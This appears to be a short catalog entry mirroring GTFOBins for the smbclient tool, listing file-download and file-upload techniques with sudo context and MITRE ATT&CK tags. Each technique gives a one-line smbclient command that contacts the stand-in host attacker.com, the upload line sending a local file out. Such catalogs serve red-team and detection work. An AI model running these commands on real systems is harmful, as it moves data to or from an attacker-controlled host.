Catalog GTFOBins

GTFO · Tool

smbclient

6 techniques Linux · macOSGTFOBins GPL-3.0

download

File DownloadPrivilege Escalation LinuxmacOS
smbclient '\\attacker.com\share' -c 'get /path/to/input-file /path/to/output-file'
Context
sudo
Native
download
MITRE
T1105

upload

File UploadPrivilege Escalation LinuxmacOS
smbclient '\\attacker.com\share' -c 'put /path/to/input-file /path/to/output-file'
Context
sudo
Native
upload
MITRE
T1041